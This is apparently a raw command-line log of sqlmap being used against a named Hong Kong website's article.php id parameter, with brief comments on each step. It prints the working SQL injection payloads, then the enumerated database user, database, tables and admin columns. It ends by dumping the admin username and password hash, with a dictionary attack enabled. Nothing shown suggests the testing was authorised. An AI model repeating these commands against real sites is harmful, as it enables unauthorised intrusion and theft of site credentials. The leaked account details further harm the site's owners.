D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>